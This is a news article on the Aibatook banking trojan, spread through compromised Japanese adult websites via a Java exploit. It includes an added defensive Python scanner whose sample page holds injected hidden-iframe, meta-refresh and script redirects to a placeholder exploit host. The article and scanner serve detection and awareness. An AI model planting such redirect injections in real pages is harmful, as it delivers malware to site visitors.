Compromised Japanese porn websites distribute banking trojan

Aibatook only targets Japanese companies, but the malware can easily be repurposed for use in the U.S.

Attackers have compromised popular Japanese adult websites in order to distribute a trojan that is primarily targeting customers of two major banks in the country; however, the malware could easily be repurposed for use in the U.S., according to researchers with ESET.

The Aibatook trojan continuously monitors browsing activity, modifies visited web pages, redirects the browser to other pages, and captures and exfiltrates information entered into web forms, Joan Calvet, a malware researcher with ESET, told SCMagazine.com in a Wednesday email.

Aibatook was first identified in late 2013, but the operators updated the malware in April for use specifically against two major Japanese banks, and more broadly against other Japanese companies, in a campaign only targeting users of Internet Explorer, according to a Wednesday post.

“Internet Explorer is the most used browser in Japan,” Calvet said, adding the attackers likely have no need to extend their browser coverage. Furthermore, the post explains, the malware's data-theft technique works by manipulating Internet Explorer directly, which is why other browsers are not affected by this campaign.

Aibatook currently targets visitors to the Japan Post and SBI Sumishin Net Bank websites with site-specific logic, and falls back to more general form grabbing to steal data entered on other Japanese company websites – but that may not always be the case, Calvet said.

“It could easily be retargeted against U.S. banks by using the configurable information stealer implemented in Aibatook, allowing its authors to add any webpage's input fields to make it a target,” Calvet said.

Although others are believed to exist, ESET researchers identified four Japanese adult websites – sokuhabo.net, uravidata.com, ppv.xxxurabi.com, and mywife.cc – that could redirect users to a page that exploits Java vulnerability CVE-2013-2465 to distribute the malware, the post indicates.
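The article does not say how the compromised sites sent visitors to the exploit page. The script below is an added example, not code from the article or from ESET, showing the kind of check a webmaster can run on a suspect page: it flags the three common ways an injected redirect is planted (a hidden or tiny off-site iframe, a meta refresh, and a script that assigns to `location`). The HTML samples and the hosts `videos.example` and `exploit.example` are constructed placeholders, and the heuristics are general ones, not a description of the Aibatook campaign's injection.

```python
"""Scan a page for injected redirects to an off-site (exploit) landing page.

Added example: constructed HTML, placeholder hosts, generic heuristics.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample of a compromised page: the meta refresh, the 1x1 hidden
# iframe and the script redirect are the "injected" parts; the YouTube embed
# is a legitimate off-site iframe that must not be flagged.
SAMPLE_PAGE = """<html><head><title>Videos</title>
<meta http-equiv="refresh" content="0;url=http://exploit.example/go.php">
</head><body>
<iframe src="http://exploit.example/java.jar" width="1" height="1" style="visibility:hidden"></iframe>
<script>window.location.href="http://exploit.example/land.php";</script>
<a href="/videos/1">video</a>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>"""

# Constructed clean page for comparison.
CLEAN_PAGE = """<html><body><a href="/videos/1">video</a>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
</body></html>"""

# Matches location = "..." and location.href = "..." inside inline scripts.
LOCATION_ASSIGN = re.compile(r"location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]")


class RedirectFinder(HTMLParser):
    """Collects (kind, url) for every off-site redirect found in the page."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []
        self._in_script = False

    def _is_offsite(self, url):
        host = urlparse(url).hostname
        return bool(host) and host.lower() != self.site_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases tag and attribute names
        if tag == "iframe":
            src = a.get("src", "")
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = "hidden" in style or "display:none" in style
            if self._is_offsite(src) and (tiny or hidden):
                self.findings.append(("hidden_iframe", src))
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url=(\S+)", a.get("content") or "", re.I)
            if m and self._is_offsite(m.group(1)):
                self.findings.append(("meta_refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are delivered raw by HTMLParser; look for redirects.
        if self._in_script:
            for m in LOCATION_ASSIGN.finditer(data):
                if self._is_offsite(m.group(1)):
                    self.findings.append(("script_redirect", m.group(1)))


def find_redirects(html, site_host):
    """Return the list of off-site redirects found in `html` for a site
    served from `site_host`, in document order."""
    parser = RedirectFinder(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, url in find_redirects(SAMPLE_PAGE, "videos.example"):
        print(f"{kind}: {url}")
    print("clean page findings:", find_redirects(CLEAN_PAGE, "videos.example"))
```

The heuristics only catch inline, unobfuscated injections; a `location.replace(...)` call, a script loaded from a third-party host, or a redirect served only to certain User-Agents or referrers (a common trick on compromised sites) would need the page fetched as a browser would and the external scripts inspected too.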

Why only use a single exploit to infect users?

“The exploitation success ratio is probably high enough for Aibatook's operators,” Calvet said, adding this appears to be the early stages of the operation. “Using a more powerful exploit pack and targeting other web browsers would be the next logical step for the operators in order to increase the number of potential victims.”

ESET researchers stated in the post that it is unclear exactly how the Japanese adult websites were compromised in the first place, but Calvet suggested that the attackers – whom ESET believes to be from Japan – might have used Aibatook itself to steal the webmasters' passwords.
